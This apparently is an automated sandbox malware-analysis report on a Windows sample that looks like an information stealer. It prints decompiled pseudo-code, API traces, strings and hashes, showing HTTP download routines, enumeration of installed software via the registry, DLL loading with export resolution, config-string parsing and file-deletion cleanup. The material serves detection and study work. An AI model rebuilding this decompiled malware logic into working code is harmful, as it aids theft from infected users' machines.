InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040522D
InternetConnectA.WININET(00000000,006109A0,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00405253
InternetConnectA.WININET(00000000,006109A0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00405278
HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00C00100,00000000), ref: 004052B3
HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00400100,00000000), ref: 004052DA
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405327
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00405343
StrCmpCA.SHLWAPI(?,200), ref: 00405359
Sleep.KERNEL32(00007530), ref: 00405374
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040539C
lstrcat.KERNEL32(?,00000000), ref: 004053D8
InternetCloseHandle.WININET(00000000), ref: 004053E4
InternetCloseHandle.WININET(00000000), ref: 004053F1
InternetCloseHandle.WININET(00000000), ref: 004053FE

Part of subcall function 00404830: memset.MSVCRT ref: 00404852
Part of subcall function 00404830: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,006109A0), ref: 0040487E
Part of subcall function 00404830: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,00000000,00000000), ref: 004048A6

Strings

wb, xrefs: 00405323, 004053E0, 00405398, 0040533F
https://, xrefs: 004051EA
200, xrefs: 0040534D

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Internet$Http$CloseHandleOpenRequest$BinaryConnectCryptString$FileInfoOptionQueryReadSendSleeplstrcatmemset
String ID: 200$https://$wb
API String ID: 3903783505-99622070
Opcode ID: ed28bf1071449e7ad06a5ff83b2de2c6207da898ebd1a13e635f1ef9f3c0d26e
Instruction ID: 3a11fd38065f95ba9f916252f7cceca424cf4b116932673e0c024cd65fd50a4c
Opcode Fuzzy Hash: ed28bf1071449e7ad06a5ff83b2de2c6207da898ebd1a13e635f1ef9f3c0d26e
Instruction Fuzzy Hash: F3612B71A45359ABEB24DB60CC49FDA77B4EB08740F1085AAB6097A1C0C7B86A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B330, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 129
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040B330(intOrPtr _a4) {
				int _v8;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				long _v2072;
				int _v2076;
				char _v3100;
				int _v3104;
				long _t44;
				char* _t69;
				char* _t77;
				char* _t84;
				char* _t87;
				void* _t92;

				_v2068 = 0;
				_v2064 = 0;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t69 =  *0x41a230; // 0x6235c8
				_t44 = RegOpenKeyExA(0x80000002, _t69, 0, 0x20019,  &_v2068);
				if(_t44 == 0) {
					_v3104 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_v2072 = RegEnumKeyExA(_v2068, _v3104,  &_v1036,  &_v2076, 0, 0, 0, 0);
						if(_v2072 != 0) {
							L14:
							_v3104 = _v3104 + 1;
							continue;
						}
						_push( &_v1036);
						_t84 =  *0x41a230; // 0x6235c8
						_push(_t84);
						wsprintfA( &_v2060, "%s\%s");
						_t92 = _t92 + 0x10;
						if(RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064) == 0) {
							_v2076 = 0x400;
							_t87 =  *0x41a71c; // 0x6294b0
							if(RegQueryValueExA(_v2064, _t87, 0,  &_v8,  &_v3100,  &_v2076) == 0) {
								_push( &_v3100);
								if( *0x41a908() > 1) {
									 *0x41aa24(_a4,  &_v3100);
									_v2076 = 0x400;
									_t77 =  *0x41a450; // 0x6295a0
									if(RegQueryValueExA(_v2064, _t77, 0,  &_v8,  &_v3100,  &_v2076) == 0) {
										 *0x41aa24(_a4, " ");
										 *0x41aa24(_a4,  &_v3100);
									}
									 *0x41aa24(_a4, "\n");
								}
							}
							RegCloseKey(_v2064);
							goto L14;
						}
						RegCloseKey(_v2064);
						return RegCloseKey(_v2068);
					}
					return RegCloseKey(_v2068);
				}
				return _t44;
			}

0x0040b339
0x0040b343
0x0040b34d
0x0040b357
0x0040b35e
0x0040b376
0x0040b382
0x0040b38a
0x0040b391
0x0040b3ac
0x0040b3b9
0x0040b3ed
0x0040b3fa
0x0040b535
0x0040b3a6
0x00000000
0x0040b3a6
0x0040b406
0x0040b407
0x0040b40d
0x0040b41a
0x0040b420
0x0040b445
0x0040b466
0x0040b484
0x0040b49a
0x0040b4a6
0x0040b4b0
0x0040b4bd
0x0040b4c3
0x0040b4e1
0x0040b4f7
0x0040b502
0x0040b513
0x0040b513
0x0040b522
0x0040b522
0x0040b4b0
0x0040b52f
0x00000000
0x0040b52f
0x0040b44e
0x00000000
0x0040b45b
0x00000000
0x0040b541
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000002,006235C8,00000000,00020019,00000000), ref: 0040B382
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 0040B3E7
wsprintfA.USER32 ref: 0040B41A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000), ref: 0040B43D
RegCloseKey.ADVAPI32(00000000), ref: 0040B44E
RegCloseKey.ADVAPI32(00000000), ref: 0040B45B

Strings

?, xrefs: 0040B357
%s\%s, xrefs: 0040B40E

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: CloseOpen$Enumwsprintf
String ID: %s\%s$?
API String ID: 2323328657-4134130046
Opcode ID: 633d1f22a7f17ada43fb024a05cd16ca398fc31fbc6fe5000daf135038cd0860
Instruction ID: e40631872db9b85caa783e97e8400b31f68121603665a09a8b222e6f0c3b8f21
Opcode Fuzzy Hash: 633d1f22a7f17ada43fb024a05cd16ca398fc31fbc6fe5000daf135038cd0860
Instruction Fuzzy Hash: A2513CB1911218ABDB10CB50CD48FEA77B8FF48304F00C5A9A249A6180DB789AC5CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 00411520, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,00412A9A,?), ref: 00411528
StrCmpCA.SHLWAPI(?,00419340,?,00412A9A,?), ref: 00411575
StrCmpCA.SHLWAPI(?,.zip,?,00412A9A,?), ref: 0041158F
StrCmpCA.SHLWAPI(?,.zoo,?,00412A9A,?), ref: 004115A9

Strings

.zip, xrefs: 00411586
.gz, xrefs: 004115FC
.lzh, xrefs: 004115CE
.tgz, xrefs: 00411613
.arc, xrefs: 004115B7
.arj, xrefs: 004115E5
.zoo, xrefs: 004115A0

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction ID: d5930b3a33e29c7b2ebfdd29e75950525031afcffcbb0299905607ea0d7068d1
Opcode Fuzzy Hash: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction Fuzzy Hash: DD318479B04204FB8B00DFB0C9849FF77B6AE59740B248056F61697760D239DE81EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004049E0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 141
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004049E0(void* __ecx, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				void* _v20;
				struct _OVERLAPPED* _v24;
				void _v1052;
				long _v1060;
				void* _v1064;
				long _v1068;
				void _v1324;
				long _v1328;
				struct _OVERLAPPED* _v1332;
				void* _t43;
				long _t46;
				int _t55;
				int _t58;
				long _t61;
				long _t65;
				long _t75;

				_v24 = 0;
				_v16 = 0;
				_v1068 = 0x100;
				_t43 = InternetOpenA(0x41401a, 1, 0, 0, 0);
				_v1064 = _t43;
				if(_v1064 != 0) {
					_t46 =  *0x41aa4c(E00404970(__ecx, __eflags, _a4), "https");
					__eflags = _t46;
					if(_t46 == 0) {
						_v16 = 1;
					}
					_v1332 = 0;
					while(1) {
						__eflags = _v1332 - 6;
						if(_v1332 >= 6) {
							break;
						}
						__eflags = _v16;
						if(_v16 == 0) {
							_v12 = InternetOpenUrlA(_v1064, _a4, 0, 0, 0x100, 0);
						} else {
							_v12 = InternetOpenUrlA(_v1064, _a4, 0, 0, 0x800100, 0);
						}
						_t61 = HttpQueryInfoA(_v12, 0x13,  &_v1324,  &_v1068, 0);
						__eflags = _t61;
						if(_t61 == 0) {
							L14:
							_t75 =  &(_v1332->Internal);
							__eflags = _t75;
							_v1332 = _t75;
							continue;
						} else {
							_t65 =  *0x41aa4c( &_v1324, "200");
							__eflags = _t65;
							if(_t65 != 0) {
								Sleep(0x7530);
								goto L14;
							}
							break;
						}
					}
					_v20 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0);
					while(1) {
						__eflags = 1;
						if(1 == 0) {
							break;
						}
						_t55 = InternetReadFile(_v12,  &_v1052, 0x400,  &_v1060);
						__eflags = _t55;
						if(_t55 == 0) {
							L21:
							break;
						}
						__eflags = _v1060;
						if(_v1060 <= 0) {
							L22:
							_v8 = _v8 + _v1060;
							__eflags = _v1060 - 0x400;
							if(_v1060 >= 0x400) {
								continue;
							}
							break;
						}
						_t58 = WriteFile(_v20,  &_v1052, _v1060,  &_v1328, 0);
						__eflags = _t58;
						if(_t58 == 0) {
							goto L21;
						}
						__eflags = _v1060 - _v1328;
						if(_v1060 == _v1328) {
							goto L22;
						}
						goto L21;
					}
					E0040B720( &_v1052, 0x400);
					CloseHandle(_v20);
					InternetCloseHandle(_v12);
					return InternetCloseHandle(_v1064);
				}
				return _t43;
			}

0x004049e9
0x004049f0
0x004049f7
0x00404a0e
0x00404a14
0x00404a21
0x00404a3a
0x00404a40
0x00404a42
0x00404a44
0x00404a44
0x00404a4b
0x00404a66
0x00404a66
0x00404a6d
0x00000000
0x00000000
0x00404a73
0x00404a77
0x00404ab6
0x00404a79
0x00404a95
0x00404a95
0x00404acf
0x00404ad5
0x00404ad7
0x00404afc
0x00404a5d
0x00404a5d
0x00404a60
0x00000000
0x00404ad9
0x00404ae5
0x00404aeb
0x00404aed
0x00404af6
0x00000000
0x00404af6
0x00000000
0x00404aef
0x00404ad7
0x00404b1d
0x00404b20
0x00404b25
0x00404b27
0x00000000
0x00000000
0x00404b40
0x00404b46
0x00404b48
0x00404b86
0x00000000
0x00404b86
0x00404b4a
0x00404b51
0x00404b88
0x00404b91
0x00404b94
0x00404b9e
0x00000000
0x00404ba2
0x00000000
0x00404ba0
0x00404b6e
0x00404b74
0x00404b76
0x00000000
0x00000000
0x00404b7e
0x00404b84
0x00000000
0x00000000
0x00000000
0x00404b84
0x00404bb3
0x00404bbc
0x00404bc6
0x00000000
0x00404bd3
0x00000000

APIs

InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E
StrCmpCA.SHLWAPI(00000000,https), ref: 00404A3A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 00404A8F
HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 00404ACF
StrCmpCA.SHLWAPI(?,200), ref: 00404AE5
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404B17
InternetReadFile.WININET(?,?,00000400,?), ref: 00404B40
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404B6E
CloseHandle.KERNEL32(?,?,00000400), ref: 00404BBC
InternetCloseHandle.WININET(?), ref: 00404BC6
InternetCloseHandle.WININET(00000000), ref: 00404BD3

Strings

https, xrefs: 00404A28
200, xrefs: 00404AD9

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CreateHttpInfoQueryReadWrite
String ID: 200$https
API String ID: 1681390745-2945048398
Opcode ID: c31e8308ac884f8f2725585f2c0d583281fa0a271bead2ab3ea92c6ff43d03ad
Instruction ID: fb624ede4d81cfb8019f53897a3e05eb4db491724901a2fa6b1ef0cdd0b3c389
Opcode Fuzzy Hash: c31e8308ac884f8f2725585f2c0d583281fa0a271bead2ab3ea92c6ff43d03ad
Instruction Fuzzy Hash: 8F5141F1A40208ABDB10DB90DC45FEA77B8BB88715F1080A9F705B62C0D778AA80CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00407900, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 105
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00407900(void* __ecx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				char _v5012;
				intOrPtr _v5016;
				CHAR* _t17;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t26;
				CHAR* _t29;
				CHAR* _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				CHAR* _t45;
				struct HINSTANCE__* _t46;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				CHAR* _t51;
				struct HINSTANCE__* _t52;
				CHAR* _t55;

				E004139B0(0x1394, __ecx);
				if(_a4 == 0) {
					return 0;
				}
				_v8 = 0xffff;
				_t17 =  *0x41a034; // 0x627b10
				_v12 = GetEnvironmentVariableA(_t17, 0x41b488, 0xffff);
				if(0x41b488 != 0) {
					E0040B720( &_v5012, 0x1388);
					 *0x41aa24( &_v5012, 0x41b488);
					 *0x41aa24( &_v5012, ";");
					 *0x41aa24( &_v5012, _a4);
					_t55 =  *0x41a034; // 0x627b10
					SetEnvironmentVariableA(_t55,  &_v5012);
					E0040B720( &_v5012, 0x1388);
				}
				_t42 =  *0x41a6cc; // 0x625870
				 *0x41a824 = LoadLibraryA(_t42);
				if( *0x41a824 != 0) {
					_t49 =  *0x41a2b0; // 0x6281b8
					_t21 =  *0x41a824; // 0x0
					 *0x41a81c = GetProcAddress(_t21, _t49);
					_t43 =  *0x41a628; // 0x628308
					_t50 =  *0x41a824; // 0x0
					 *0x41a840 = GetProcAddress(_t50, _t43);
					_t24 =  *0x41a1b4; // 0x629000
					_t44 =  *0x41a824; // 0x0
					 *0x41a7ec = GetProcAddress(_t44, _t24);
					_t51 =  *0x41a12c; // 0x628260
					_t26 =  *0x41a824; // 0x0
					 *0x41a814 = GetProcAddress(_t26, _t51);
					_t45 =  *0x41a7b4; // 0x628d60
					_t52 =  *0x41a824; // 0x0
					 *0x41a828 = GetProcAddress(_t52, _t45);
					_t29 =  *0x41a358; // 0x6282a8
					_t46 =  *0x41a824; // 0x0
					 *0x41a80c = GetProcAddress(_t46, _t29);
				}
				if( *0x41a81c == 0 ||  *0x41a840 == 0 ||  *0x41a7ec == 0 ||  *0x41a828 == 0 ||  *0x41a80c == 0 ||  *0x41a814 == 0) {
					_v5016 = 0;
				} else {
					_v5016 = 1;
				}
				return _v5016;
			}

0x00407908
0x00407911
0x00000000
0x00407ab0
0x00407917
0x00407928
0x00407934
0x0040793e
0x0040794c
0x0040795d
0x0040796f
0x00407980
0x0040798d
0x00407994
0x004079a6
0x004079a6
0x004079ab
0x004079b8
0x004079c4
0x004079ca
0x004079d1
0x004079dd
0x004079e2
0x004079e9
0x004079f6
0x004079fb
0x00407a01
0x00407a0e
0x00407a13
0x00407a1a
0x00407a26
0x00407a2b
0x00407a32
0x00407a3f
0x00407a44
0x00407a4a
0x00407a57
0x00407a57
0x00407a63
0x00407a9e
0x00407a92
0x00407a92
0x00407a92
0x00000000

APIs

GetEnvironmentVariableA.KERNEL32(00627B10,0041B488,0000FFFF), ref: 0040792E
lstrcat.KERNEL32(?,0041B488), ref: 0040795D
lstrcat.KERNEL32(?,004191E8), ref: 0040796F
lstrcat.KERNEL32(?,00000000), ref: 00407980
SetEnvironmentVariableA.KERNEL32(00627B10,?), ref: 00407994
LoadLibraryA.KERNEL32(00625870), ref: 004079B2
GetProcAddress.KERNEL32(00000000,006281B8), ref: 004079D7
GetProcAddress.KERNEL32(00000000,00628308), ref: 004079F0
GetProcAddress.KERNEL32(00000000,00629000), ref: 00407A08
GetProcAddress.KERNEL32(00000000,00628260), ref: 00407A20
GetProcAddress.KERNEL32(00000000,00628D60), ref: 00407A39
GetProcAddress.KERNEL32(00000000,006282A8), ref: 00407A51

Strings

pXb, xrefs: 004079AB

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AddressProc$lstrcat$EnvironmentVariable$LibraryLoad
String ID: pXb
API String ID: 570708976-2054055530
Opcode ID: 7abf122d6e215ba9c63e42e8549cfde015a8d6489de665f1db2b59e3b6550401
Instruction ID: 77b6c5c08cf9b7a4301e695bc4720b41c2074284124323e2e0bb79b02c60fe80
Opcode Fuzzy Hash: 7abf122d6e215ba9c63e42e8549cfde015a8d6489de665f1db2b59e3b6550401
Instruction Fuzzy Hash: FD4120B5616200DFC714EFA4ED48AEA37F4A708305F14C57AF105926A1C77C96A2CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCF0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 0040BDE3
g@A, xrefs: 0040BE4C, 0040BE4F
g@A, xrefs: 0040BD1C, 0040BE70, 0040BD1F, 0040BE73

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID:
String ID: image/jpeg$g@A$g@A
API String ID: 0-1537867833
Opcode ID: 13642a03564dce3ec8fa5213b0d982587bde0afc6153abd95ccba73b638ac59e
Instruction ID: 94b623c1a3e4286d278b3a98d93620b6c1d28f1eb204197fa047bb13e3fbbd8a
Opcode Fuzzy Hash: 13642a03564dce3ec8fa5213b0d982587bde0afc6153abd95ccba73b638ac59e
Instruction Fuzzy Hash: 3251FAB5A11208AFCB04DBE4DC44FEEB7B9EF4C701F148929F605E6290D734A951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE0, Relevance: 21.0, APIs: 7, Strings: 5, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DE0() {
				CHAR* _t1;
				CHAR* _t5;
				CHAR* _t9;
				CHAR* _t11;
				CHAR* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t1 =  *0x41a6a4; // 0x626fc0
				DeleteFileA(_t1);
				_t11 =  *0x41a2f0; // 0x626db8
				DeleteFileA(_t11);
				_t13 =  *0x41a650; // 0x627060
				DeleteFileA(_t13);
				_t5 =  *0x41a220; // 0x627128
				DeleteFileA(_t5);
				_t12 =  *0x41a6cc; // 0x625870
				DeleteFileA(_t12);
				_t14 =  *0x41a4a8; // 0x626d68
				DeleteFileA(_t14);
				_t9 =  *0x41a700; // 0x627240
				return DeleteFileA(_t9);
			}

0x00405de3
0x00405de9
0x00405def
0x00405df6
0x00405dfc
0x00405e03
0x00405e09
0x00405e0f
0x00405e15
0x00405e1c
0x00405e22
0x00405e29
0x00405e2f
0x00405e3c

APIs

DeleteFileA.KERNEL32(00626FC0,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405DE9
DeleteFileA.KERNEL32(00626DB8,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405DF6
DeleteFileA.KERNEL32(00627060,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E03
DeleteFileA.KERNEL32(00627128,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E0F
DeleteFileA.KERNEL32(00625870,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E1C
DeleteFileA.KERNEL32(00626D68,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E29
DeleteFileA.KERNEL32(00627240,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E35

Strings

(qb, xrefs: 00405E09
`pb, xrefs: 00405DFC
hmb, xrefs: 00405E22
@rb, xrefs: 00405E2F
pXb, xrefs: 00405E15

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: DeleteFile
String ID: (qb$@rb$`pb$hmb$pXb
API String ID: 4033686569-4012415095
Opcode ID: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction ID: 53f7d35bc311ab0ea18b8a2534d9d90475545ede5d55a6c2cac6028fe6962c5d
Opcode Fuzzy Hash: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction Fuzzy Hash: D7F014F95232009BC7049BA4ED4C8A637A9B7CC621305C928B50683225CB39E5608B7B

Uniqueness

Uniqueness Score: -1.00%

Function 004082E0, Relevance: 19.7, APIs: 13, Instructions: 155stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040830F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040835F
RtlAllocateHeap.NTDLL(00000000), ref: 00408366
lstrcat.KERNEL32(?,00628470), ref: 004083E1

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00000000), ref: 00408425
lstrcat.KERNEL32(?,00628488), ref: 00408438
lstrcat.KERNEL32(?,?), ref: 0040844C
lstrcat.KERNEL32(?,00628DC0), ref: 00408460
lstrcat.KERNEL32(?,?), ref: 00408474
lstrcat.KERNEL32(?,004191F0), ref: 00408486
lstrcat.KERNEL32(?,?), ref: 0040849A
lstrcat.KERNEL32(?,00418BC0), ref: 004084AC
lstrlen.KERNEL32(?), ref: 004084BE

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$AllocAllocateLocalProcesslstrlenmemsetwsprintf
String ID:
API String ID: 2806430148-0
Opcode ID: 625843ca34ed7e0e1c7bac87bae398836e1447a572bc5b4c7a4beef6269fe3f9
Instruction ID: 59f89f9cc7d9a5e3f1725e4a0dc26015c1addf92b97e6f17d5df6be883cb31b8
Opcode Fuzzy Hash: 625843ca34ed7e0e1c7bac87bae398836e1447a572bc5b4c7a4beef6269fe3f9
Instruction Fuzzy Hash: 885168B1A00108ABCB14DFA4DD4AEDA77B8AF4C705F0085A4F709D3251DA35DEA1CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00406320, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 185
stringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00406320(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v5548;
				char* _v5552;
				char _v5820;
				char* _v5824;
				char _v5828;
				char _v5832;
				signed int _v5836;
				char* _t74;
				intOrPtr _t79;
				void* _t99;
				void* _t100;

				E004139B0(0x16c8, __ecx);
				_v5552 = 1;
				E0040B720( &_v5548, 0x1388);
				E0040B720( &_v540, 0x104);
				E0040B720( &_v5820, 0x104);
				E0040B720( &_v276, 0x104);
				E0040B720( &_v5832, 4);
				 *0x41aa24( &_v5548, _a4);
				_t74 = E0040C090( &_v5548, "|",  &_v5828);
				_t100 = _t99 + 0xc;
				_v5824 = _t74;
				_v8 = 1;
				while(_v5824 != 0) {
					_v5836 = _v8;
					_v5836 = _v5836 - 1;
					if(_v5836 <= 6) {
						switch( *((intOrPtr*)(_v5836 * 4 +  &M0040662C))) {
							case 0:
								if(_v5552 == 0) {
									E0040B720( &_v540, 0x104);
									_push(_v5824);
									_push( &_v540);
									 *0x41aa24();
								} else {
									_push("1");
									_push(_v5824);
									if( *0x41aa4c() == 0) {
										 *0x41aba4 = 1;
									}
								}
								goto L37;
							case 1:
								__eflags = _v5552;
								if(_v5552 == 0) {
									_v544 = E0040B650(__ecx, _v5824);
								} else {
									_push("1");
									__ecx = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41aba8 = 1;
									}
								}
								goto L37;
							case 2:
								__eflags = _v5552;
								if(_v5552 == 0) {
									__ecx =  &_v5820;
									__eax = E0040B720( &_v5820, 0x104);
									_push(_v5824);
									__eax =  &_v5820;
									_push( &_v5820);
									__eax =  *0x41aa24();
								} else {
									_push("1");
									__eax = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41abac = 1;
									}
								}
								goto L37;
							case 3:
								__eflags = _v5552;
								if(_v5552 == 0) {
									E0040B720( &_v276, 0x104) = _v5824;
									_push(_v5824);
									__ecx =  &_v276;
									_push( &_v276);
									__eax =  *0x41aa24();
								} else {
									_push("1");
									__ecx = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41abb0 = 1;
									}
									_v5552 = 0;
									_v8 = 0;
								}
								goto L37;
							case 4:
								_push("0");
								_push(_v5824);
								__eax =  *0x41aa4c();
								__eflags = __eax;
								if(__eax != 0) {
									_v12 = 1;
								} else {
									_v12 = 0;
								}
								goto L37;
							case 5:
								_push("0");
								__eax = _v5824;
								_push(_v5824);
								__eax =  *0x41aa4c();
								__eflags = __eax;
								if(__eax != 0) {
									_v5832 = 1;
								} else {
									_v5832 = 0;
								}
								goto L37;
							case 6:
								__ecx = _v5824;
								_t51 =  &_a8; // 0x406751
								__eax =  *_t51;
								__ecx = _v12;
								__eax =  &_v5820;
								__ecx = _v544;
								__eax = E00406130(_v544, __eflags,  &_v540, _v544,  &_v5820,  &_v276, _v12,  *_t51, _v5832, _v5824);
								_v8 = 0;
								goto L37;
						}
					}
					L37:
					_v8 = _v8 + 1;
					_t79 = E0040C090(0, "|",  &_v5828);
					_t100 = _t100 + 0xc;
					_v5824 = _t79;
				}
				return E0040B720( &_v5548, 0x1388);
			}

0x00406328
0x0040632d
0x00406343
0x00406354
0x00406365
0x00406376
0x00406384
0x00406394
0x004063ad
0x004063b2
0x004063b5
0x004063bb
0x004063c2
0x004063d2
0x004063e1
0x004063ee
0x004063fa
0x00000000
0x00406408
0x00406438
0x00406443
0x0040644a
0x0040644b
0x0040640a
0x0040640a
0x00406415
0x0040641e
0x00406420
0x00406420
0x0040642a
0x00000000
0x00000000
0x00406456
0x0040645d
0x00406490
0x0040645f
0x0040645f
0x00406464
0x0040646a
0x0040646b
0x00406471
0x00406473
0x00406475
0x00406475
0x0040647f
0x00000000
0x00000000
0x0040649b
0x004064a2
0x004064cb
0x004064d2
0x004064dd
0x004064de
0x004064e4
0x004064e5
0x004064a4
0x004064a4
0x004064a9
0x004064af
0x004064b0
0x004064b6
0x004064b8
0x004064ba
0x004064ba
0x004064c4
0x00000000
0x00000000
0x004064f0
0x004064f7
0x0040653d
0x00406543
0x00406544
0x0040654a
0x0040654b
0x004064f9
0x004064f9
0x004064fe
0x00406504
0x00406505
0x0040650b
0x0040650d
0x0040650f
0x0040650f
0x00406519
0x00406523
0x00406523
0x00000000
0x00000000
0x00406556
0x00406561
0x00406562
0x00406568
0x0040656a
0x00406575
0x0040656c
0x0040656c
0x0040656c
0x00000000
0x00000000
0x0040657e
0x00406583
0x00406589
0x0040658a
0x00406590
0x00406592
0x004065a0
0x00406594
0x00406594
0x00406594
0x00000000
0x00000000
0x004065ac
0x004065ba
0x004065ba
0x004065be
0x004065c9
0x004065d0
0x004065de
0x004065e6
0x00000000
0x00000000
0x004063fa
0x004065ed
0x004065f3
0x00406604
0x00406609
0x0040660c
0x0040660c
0x0040662b

APIs

lstrcat.KERNEL32(?,?), ref: 00406394
